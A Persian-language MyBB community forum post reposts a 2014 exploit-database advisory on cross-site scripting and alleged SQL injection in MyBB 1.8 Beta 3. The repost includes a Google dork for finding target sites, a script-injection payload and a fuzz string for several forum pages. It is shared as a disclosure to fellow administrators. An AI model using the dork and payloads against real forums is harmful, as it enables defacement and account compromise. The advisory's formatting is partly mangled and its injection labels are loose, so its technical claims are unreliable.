هاست لینوکس

آخرین بسته‌ی MyBB: نسخه‌ی 1.8.27 MyBB منتشر شد


امتیاز موضوع:
  • 0 رأی - میانگین امتیازات: 0
  • 1
  • 2
  • 3
  • 4
  • 5
مشکل امنیتی MyBB 1.8 Beta 3
#1
Lightbulb 
سلام.
امروز باگ مای بی بی 1.6.15 رو گذاشتم.
این 1.8 هم تازه منتشر شده :

کد php:
###########################

# MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection

###########################

# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
***************************************************
aCross Site Scripting in Installation Wizard Board Configuration )
Fill -Forum NameWebsite NameWebsite URLwith your code, for example "><script>alert('DemoLisH')</script>localhost/install/index.php
Now let's finish setup and go to the homepage.
 
 
b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example:localhost/private.php
Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " 
> < prompt \x41 %42 constructor onload
 
 
c
SQL Injection in Showthread
Go to 
-> Show Thread, for example:localhost/showthread.php?tid=1
Search at the following code Keywords
:<foo> <h1> <scriptalert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
 
 
dSQL Injection in Search
Go to 
-> Search, for example:localhost/search.php
Search at the following code Keywords
:<foo> <h1> <scriptalert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
 
 
eSQL Injection in Help Documents
Go to 
-> Help Documents, for example:localhost/misc.php?action=help
Search at the following code Keywords
:<foo> <h1> <scriptalert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
 
 
fSQL Injection in Forum Display
Go to 
-> Forum Display, for example:localhost/forumdisplay.php?fid=2
Search at the following code 
"Search this Forum":<foo> <h1> <scriptalert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
 
***************************************************
[~
#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2014-08-23]

########################### 

لینک :

http://www.iedb.ir/exploits-1872.html

این هم برای اطلاع رسانی به دوستان.
پاسخ
 سپاس شده توسطR. Najafi (۱۳۹۳/۶/۳، ۰۰:۰۳:۵۲ صبح) ، Mohammad-Mo (۱۳۹۳/۶/۳، ۱۰:۳۳:۱۶ صبح) ، Amin Yaghubi (۱۳۹۳/۶/۵، ۱۳:۳۲:۵۷ عصر) ، - LORD - (۱۳۹۳/۶/۹، ۰۵:۳۴:۲۱ صبح)


پیام‌های داخل این موضوع
مشکل امنیتی MyBB 1.8 Beta 3 - توسط Am!r - ۱۳۹۳/۶/۲، ۱۷:۴۲:۴۱ عصر
RE: مشکل امنیتی MyBB 1.8 Beta 3 - توسط MohamadReza - ۱۳۹۳/۶/۲، ۱۸:۰۴:۲۰ عصر
RE: مشکل امنیتی MyBB 1.8 Beta 3 - توسط Am!r - ۱۳۹۳/۶/۲، ۲۳:۴۱:۵۰ عصر
RE: مشکل امنیتی MyBB 1.8 Beta 3 - توسط MohamadReza - ۱۳۹۳/۶/۲، ۲۳:۴۹:۵۳ عصر
RE: مشکل امنیتی MyBB 1.8 Beta 3 - توسط R. Najafi - ۱۳۹۳/۶/۳، ۰۰:۱۲:۲۱ صبح
RE: مشکل امنیتی MyBB 1.8 Beta 3 - توسط Am!r - ۱۳۹۳/۶/۳، ۰۰:۱۳:۱۳ صبح

پرش به انجمن:


کاربرانِ درحال بازدید از این موضوع: 1 مهمان